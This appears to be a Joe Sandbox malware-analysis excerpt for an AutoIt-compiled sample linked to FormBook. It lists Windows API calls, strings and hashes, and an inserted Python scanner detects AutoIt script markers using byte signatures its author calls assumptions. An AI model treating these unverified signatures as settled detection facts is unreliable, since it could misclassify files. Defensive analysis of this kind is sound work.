                                                                                  APIs
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00553735
                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0058DC00,00000000,?,00000000,?,?), ref: 005537A3
                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 005537EB
                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00553874
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00553B94
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00553BA1
                                                                                  Similarity
                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                  • API String ID: 536824911-966354055
                                                                                  • Opcode ID: 5672ea0b2d145af01a449ea92210559b94d55159b2967e16d435c72a656da581
                                                                                  • Instruction ID: 654956f2d6e00bde08ea06e030065ee34253a2a163e99edaa9d6b651f0f47820
                                                                                  • Opcode Fuzzy Hash: 5672ea0b2d145af01a449ea92210559b94d55159b2967e16d435c72a656da581
                                                                                  • Instruction Fuzzy Hash: 750269752006019FCB14EF15C855E2EBBE5FF88724F04885EF98A9B2A1CB34ED45CB85
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00556C56
                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00556D16
                                                                                  Similarity
                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                  • API String ID: 3974292440-719923060
                                                                                  • Opcode ID: e8ab152b855874d2256c4aa056cd4b8b5591633037b6ad7fec58da32d73dbb58
                                                                                  • Instruction ID: fd531b0430de0b04d129f62950be3f0fef7572d0b16731cc6927ade3ca3c39b7
                                                                                  • Opcode Fuzzy Hash: e8ab152b855874d2256c4aa056cd4b8b5591633037b6ad7fec58da32d73dbb58
                                                                                  • Instruction Fuzzy Hash: 89A16D302042869FDB14EF10C866A7EBBA6BF85315F504D6EBD565B2D2DB31EC09CB81
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0052CF91
                                                                                  • __swprintf.LIBCMT ref: 0052D032
                                                                                  • _wcscmp.LIBCMT ref: 0052D045
                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0052D09A
                                                                                  • _wcscmp.LIBCMT ref: 0052D0D6
                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 0052D10D
                                                                                  • GetDlgCtrlID.USER32(?), ref: 0052D15F
                                                                                  • GetWindowRect.USER32(?,?), ref: 0052D195
                                                                                  • GetParent.USER32(?), ref: 0052D1B3
                                                                                  • ScreenToClient.USER32(00000000), ref: 0052D1BA
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0052D234
                                                                                  • _wcscmp.LIBCMT ref: 0052D248
                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0052D26E
                                                                                  • _wcscmp.LIBCMT ref: 0052D282
                                                                                  Similarity
                                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                  • String ID: %s%u
                                                                                  • API String ID: 3119225716-679674701
                                                                                  • Opcode ID: 754f3122ada78f340d9fd235eb3bd6f0cd1a975083d8e33cca64cf925458c6d4
                                                                                  • Instruction ID: 6a5ed2fba01cddc582c7a402eb3f310d3a1b81ee75769eb7e4b5179f247b7355
                                                                                  • Opcode Fuzzy Hash: 754f3122ada78f340d9fd235eb3bd6f0cd1a975083d8e33cca64cf925458c6d4
                                                                                  • Instruction Fuzzy Hash: C7A1E032204716EFD714DF64E884BAABBB8FF45354F008519FA99D21D0DB30EA55CBA1
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 0052D8EB
                                                                                  • _wcscmp.LIBCMT ref: 0052D8FC
                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 0052D924
                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 0052D941
                                                                                  • _wcscmp.LIBCMT ref: 0052D95F
                                                                                  • _wcsstr.LIBCMT ref: 0052D970
                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0052D9A8
                                                                                  • _wcscmp.LIBCMT ref: 0052D9B8
                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 0052D9DF
                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0052DA28
                                                                                  • _wcscmp.LIBCMT ref: 0052DA38
                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 0052DA60
                                                                                  • GetWindowRect.USER32(00000004,?), ref: 0052DAC9
                                                                                  Similarity
                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                  • String ID: @$ThumbnailClass
                                                                                  • API String ID: 1788623398-1539354611
                                                                                  • Opcode ID: dd1e4da48936d4e715dce0ee69bc49eaef62e1e1928a9609fc1cc31df3b70ad0
                                                                                  • Instruction ID: 9ed1e89f7e651ace867d3b32f13c0d0b786b98e050c44ca5ee36b53ad7630ac6
                                                                                  • Opcode Fuzzy Hash: dd1e4da48936d4e715dce0ee69bc49eaef62e1e1928a9609fc1cc31df3b70ad0
                                                                                  • Instruction Fuzzy Hash: 96819D310082199BDB01DF14E985FAA7FB8FF86314F04846AFD899A096DB30DD85CBB1
                                                                                  Similarity
                                                                                  • API ID: __wcsnicmp
                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                  • API String ID: 1038674560-1810252412
                                                                                  • Opcode ID: d7b51bea3cddb7061cff4a9653ee49d181a55b38b8778ce8dd9b6721b4ae9fb4
                                                                                  • Instruction ID: 0270473c697e8d5ee7e1986adc48fc6ea5a2a1c8aca26ef592d5bd8ce6581f14
                                                                                  • Opcode Fuzzy Hash: d7b51bea3cddb7061cff4a9653ee49d181a55b38b8778ce8dd9b6721b4ae9fb4
                                                                                  • Instruction Fuzzy Hash: 3E31DE31A4421DAADB14FA55EE53FFDBBB4BF22314F20012AF601B10D1EB65AE44C679
                                                                                  APIs
                                                                                  • LoadIconW.USER32(00000063), ref: 0052EAB0
                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0052EAC2
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0052EAD9
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0052EAEE
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0052EAF4
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0052EB04
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0052EB0A
                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0052EB2B
                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0052EB45
                                                                                  • GetWindowRect.USER32(?,?), ref: 0052EB4E
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0052EBB9
                                                                                  • GetDesktopWindow.USER32 ref: 0052EBBF
                                                                                  • GetWindowRect.USER32(00000000), ref: 0052EBC6
                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0052EC12
                                                                                  • GetClientRect.USER32(?,?), ref: 0052EC1F
                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0052EC44
                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0052EC6F
                                                                                  Similarity
                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                  • String ID:
                                                                                  • API String ID: 3869813825-0
                                                                                  • Opcode ID: 53b7ddd9a7e69179a915cc565fbb073dbd8319ee69067e2a946b659838eb6532
                                                                                  • Instruction ID: 19f6df79ef8c9eb0e40fb59eb2a198fd1a692ba959bdb3df68780e9718fdcec9
                                                                                  • Opcode Fuzzy Hash: 53b7ddd9a7e69179a915cc565fbb073dbd8319ee69067e2a946b659838eb6532
                                                                                  • Instruction Fuzzy Hash: 1E514C71900709AFDB20DFA8ED8AF6EBBF5FF05705F004928E586A25A0C774A948DF10
                                                                                  APIs
                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 005479C6
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 005479D1
                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 005479DC
                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 005479E7
                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 005479F2
                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 005479FD
                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00547A08
                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00547A13
                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00547A1E
                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00547A29
                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00547A34
                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00547A3F
                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00547A4A
                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00547A55
                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00547A60
                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00547A6B
                                                                                  • GetCursorInfo.USER32(?), ref: 00547A7B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$Load$Info
                                                                                  • String ID:
                                                                                  • API String ID: 2577412497-0
                                                                                  • Opcode ID: 2620328edc3e1e2a9ff2d1813b0fc8d772f8e264f55626a9ec4d75cd08b6dcd4
                                                                                  • Instruction ID: bb9df42800471d1c96ce7f67663887b9a297adc530f8261e19f1ed3982e722ff
                                                                                  • Opcode Fuzzy Hash: 2620328edc3e1e2a9ff2d1813b0fc8d772f8e264f55626a9ec4d75cd08b6dcd4
                                                                                  • Instruction Fuzzy Hash: E23105B1D4831E6ADB109FB69C8999FBFF8FF04754F50452AA50DE7280DB78A5008FA1
                                                                                  APIs
                                                                                    • Part of subcall function 0050E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,004FC8B7,?,00002000,?,?,00000000,?,004F419E,?,?,?,0058DC00), ref: 0050E984
                                                                                    • Part of subcall function 004F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004F53B1,?,?,004F61FF,?,00000000,00000001,00000000), ref: 004F662F
                                                                                  • __wsplitpath.LIBCMT ref: 004FC93E
                                                                                    • Part of subcall function 00511DFC: __wsplitpath_helper.LIBCMT ref: 00511E3C
                                                                                  • _wcscpy.LIBCMT ref: 004FC953
                                                                                  • _wcscat.LIBCMT ref: 004FC968
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 004FC978
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 004FCABE
                                                                                    • Part of subcall function 004FB337: _wcscpy.LIBCMT ref: 004FB36F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                  • API String ID: 2258743419-1018226102
                                                                                  • Opcode ID: 438e1fe3da68a369fa608f18c3274b7f3c71d172dec888fa5d955cc32357b5f9
                                                                                  • Instruction ID: e77fbd02407061e049a441f576567a1e2c940da38881f73a72dc8042e6325c6e
                                                                                  • Opcode Fuzzy Hash: 438e1fe3da68a369fa608f18c3274b7f3c71d172dec888fa5d955cc32357b5f9
                                                                                  • Instruction Fuzzy Hash: CD12CF715083499FC724EF24C985AAFBBE4BFD9304F00491EF589932A1DB34EA49CB56
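                                                                                  The strings attached to this function (">>>AUTOIT SCRIPT<<<", "AU3!", "EA06", and the "#include depth exceeded" / "Bad directive syntax error" messages) are the AutoIt interpreter's own script-loader text, which is what backs the report's "Binary is likely a compiled AutoIt script file" signature. The scanner below is an added example, not code from the report, from Joe Sandbox or from AutoIt: it searches a file image for the compiled-script signature and the script marker so the same verdict can be reproduced offline on a sample. The concatenated "AU3!EA06" form, the 16-byte resource magic assumed to precede it, and the UTF-16LE encoding of the marker come from my own knowledge of the AutoIt3 format and are assumptions, not facts the report states; the sample buffers are constructed here for the test.

```python
"""Locate compiled-AutoIt script markers in a file image (added example)."""
import re

# "AU3!" and "EA06" appear as separate strings in the report; the compiled-
# script signature is their concatenation (assumption from the AutoIt3 format).
AU3_SIGNATURE = b"AU3!EA06"
# 16-byte magic that precedes AU3!EA06 in the embedded script resource
# (assumption, not shown in the report).
AU3_RESOURCE_MAGIC = bytes.fromhex("a3484bbe986c4aa9994c530a86d6487d")
# Marker the AutoIt loader searches for to find the embedded script.
SCRIPT_MARKER = ">>>AUTOIT SCRIPT<<<"


def _offsets(pattern: bytes, data: bytes) -> list[int]:
    """All byte offsets at which `pattern` occurs in `data`."""
    return [m.start() for m in re.finditer(re.escape(pattern), data)]


def find_autoit_markers(data: bytes) -> dict[str, list[int]]:
    """Return the offsets of every AutoIt marker found in `data`.

    The script marker is checked in both ASCII and UTF-16LE, because the
    binary stores it as a wide string (assumption) while string dumps such
    as the report's usually show it narrowed to ASCII.
    """
    return {
        "resource_magic": _offsets(AU3_RESOURCE_MAGIC, data),
        "au3_signature": _offsets(AU3_SIGNATURE, data),
        "script_marker_ascii": _offsets(SCRIPT_MARKER.encode("ascii"), data),
        "script_marker_utf16": _offsets(SCRIPT_MARKER.encode("utf-16-le"), data),
    }


def signature_has_magic_prefix(data: bytes) -> bool:
    """True when every AU3!EA06 hit is directly preceded by the resource magic.

    A hit without the magic is more likely a stray string (e.g. in a YARA
    rule embedded in a tool) than an actual compiled script resource.
    """
    hits = _offsets(AU3_SIGNATURE, data)
    return bool(hits) and all(
        off >= len(AU3_RESOURCE_MAGIC)
        and data[off - len(AU3_RESOURCE_MAGIC):off] == AU3_RESOURCE_MAGIC
        for off in hits
    )


def is_compiled_autoit(data: bytes) -> bool:
    """Heuristic verdict: signature or script marker present anywhere."""
    h = find_autoit_markers(data)
    return bool(h["au3_signature"] or h["script_marker_ascii"] or h["script_marker_utf16"])


def scan_file(path: str) -> dict:
    """Scan a file on disk and return the verdict plus marker offsets."""
    with open(path, "rb") as fh:
        data = fh.read()
    return {
        "compiled_autoit": is_compiled_autoit(data),
        "magic_confirmed": signature_has_magic_prefix(data),
        "markers": find_autoit_markers(data),
    }


# Constructed sample buffers (not real PE files): a plain stub, and the same
# stub with an AutoIt script resource appended.
SAMPLE_CLEAN = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 256
SAMPLE_COMPILED = (
    SAMPLE_CLEAN
    + AU3_RESOURCE_MAGIC
    + AU3_SIGNATURE
    + b"\x00" * 32
    + SCRIPT_MARKER.encode("utf-16-le")
    + b"\x00\x00"
)

if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(p, scan_file(p))
```

                                                                                  Run it as `python scan_au3.py sample.exe`. A positive result only says the file is an AutoIt-compiled executable, which is also true of plenty of benign software; the report's FormBook verdict comes from the injected payload and network behaviour, not from this marker alone.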
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0055CEFB
                                                                                  • DestroyWindow.USER32(?,?), ref: 0055CF73
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0055CFF4
                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0055D016
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0055D025
                                                                                  • DestroyWindow.USER32(?), ref: 0055D042
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,004F0000,00000000), ref: 0055D075
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0055D094
                                                                                  • GetDesktopWindow.USER32 ref: 0055D0A9
                                                                                  • GetWindowRect.USER32(00000000), ref: 0055D0B0
                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0055D0C2
                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0055D0DA
                                                                                    • Part of subcall function 0050B526: GetWindowLongW.USER32(?,000000EB), ref: 0050B537
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                  • String ID: 0$tooltips_class32
                                                                                  • API String ID: 3877571568-3619404913
                                                                                  • Opcode ID: 4d142e32a5b19eac6509fa9afef8ff3d340abcd0193ffe52119b72629591d8a9
                                                                                  • Instruction ID: a6d98bcb478dafe05a938f469f6069dba1c4be6fe5cab721a24420fdc4be8c02
                                                                                  • Opcode Fuzzy Hash: 4d142e32a5b19eac6509fa9afef8ff3d340abcd0193ffe52119b72629591d8a9
                                                                                  • Instruction Fuzzy Hash: 2F719A71140205AFD720CF28CC99FAA7BF5FB88704F54451EF9858B2A1E770E94ADB26
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 0055F37A
                                                                                    • Part of subcall function 0055D7DE: ClientToScreen.USER32(?,?), ref: 0055D807
                                                                                    • Part of subcall function 0055D7DE: GetWindowRect.USER32(?,?), ref: 0055D87D
                                                                                    • Part of subcall function 0055D7DE: PtInRect.USER32(?,?,0055ED5A), ref: 0055D88D
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0055F3E3
                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0055F3EE
                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0055F411
                                                                                  • _wcscat.LIBCMT ref: 0055F441
                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0055F458
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0055F471
                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0055F488
                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0055F4AA
                                                                                  • DragFinish.SHELL32(?), ref: 0055F4B1
                                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0055F59C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                  • API String ID: 169749273-3440237614
                                                                                  • Opcode ID: 62f288632ae35f771eb4a4c39e061f1cf47011734db28cda09c2f2c4212370a4
                                                                                  • Instruction ID: 305d982ea6361b597518cc21cc930338504c03c091a3a339090ea9fc9ba8b2f6
                                                                                  • Opcode Fuzzy Hash: 62f288632ae35f771eb4a4c39e061f1cf47011734db28cda09c2f2c4212370a4
                                                                                  • Instruction Fuzzy Hash: 98616C71008305AFC710EF60DC89DAFBBF8BF99714F000A1EF695921A1DB70A949DB62
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(00000000), ref: 0053AB3D
                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0053AB46
                                                                                  • VariantClear.OLEAUT32(?), ref: 0053AB52
                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0053AC40
                                                                                  • __swprintf.LIBCMT ref: 0053AC70
                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 0053AC9C
                                                                                  • VariantInit.OLEAUT32(?), ref: 0053AD4D
                                                                                  • SysFreeString.OLEAUT32(00000016), ref: 0053ADDF
                                                                                  • VariantClear.OLEAUT32(?), ref: 0053AE35
                                                                                  • VariantClear.OLEAUT32(?), ref: 0053AE44
                                                                                  • VariantInit.OLEAUT32(00000000), ref: 0053AE80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                  • API String ID: 3730832054-3931177956
                                                                                  • Opcode ID: 4c2f001ba78ba49643eb6499ce2c66527bb73681c2af59dc5a3bbe37ca6184ba
                                                                                  • Instruction ID: d8303b59d9cd3e8351508c4d0c8b30e023dbce301e682b402b4b372046324e58
                                                                                  • Opcode Fuzzy Hash: 4c2f001ba78ba49643eb6499ce2c66527bb73681c2af59dc5a3bbe37ca6184ba
                                                                                  • Instruction Fuzzy Hash: 93D1E171A0020ADBDB209F65D899B7EFFB9FF84700F148855E4859B191DB74EC40EBA2
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 005571FC
                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00557247
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                  • API String ID: 3974292440-4258414348
                                                                                  • Opcode ID: bf530028ef5bf4a67c4992ecaf86b79cf154ac54832494afd0b0efe2d9320a5c
                                                                                  • Instruction ID: 68bf77bca3eb8f086dda8dd78117c9a25cc0fde263fa9c44c146bb87a7d918ef
                                                                                  • Opcode Fuzzy Hash: bf530028ef5bf4a67c4992ecaf86b79cf154ac54832494afd0b0efe2d9320a5c
                                                                                  • Instruction Fuzzy Hash: 7D916C342046069BCB04EF10D851A6EBFA1BF99314F10485EBD966B3A2DB75ED0ACB85
                                                                                  APIs
                                                                                  • EnumChildWindows.USER32(?,0052CF50), ref: 0052CE90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChildEnumWindows
                                                                                  • String ID: 4+Z$CLASS$CLASSNN$H+Z$INSTANCE$L+Z$NAME$P+Z$REGEXPCLASS$T+Z$TEXT
                                                                                  • API String ID: 3555792229-2646979935
• Opcode ID: 995030153d7de0a534cf28b7fd6fe637a1e96b5ee4c2cccd658ab2a3ef8fec7a
• Instruction ID: 4efafa41ebd7f1f77cea85a064ad87409eb311a936a900bcceb3912bd59347e4
• Opcode Fuzzy Hash: 995030153d7de0a534cf28b7fd6fe637a1e96b5ee4c2cccd658ab2a3ef8fec7a
• Instruction Fuzzy Hash: C891A13060051AABDB19DF60D482BEEFFB9BF06300F518519E959A71C2DF306999DBE0
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0055E5AB
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0055BEAF), ref: 0055E607
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0055E647
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0055E68C
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0055E6C3
• FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0055BEAF), ref: 0055E6CF
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0055E6DF
• DestroyIcon.USER32(?,?,?,?,?,0055BEAF), ref: 0055E6EE
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0055E70B
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0055E717
  • Part of subcall function 00510FA7: __wcsicmp_l.LIBCMT ref: 00511030
Strings
Memory Dump Source
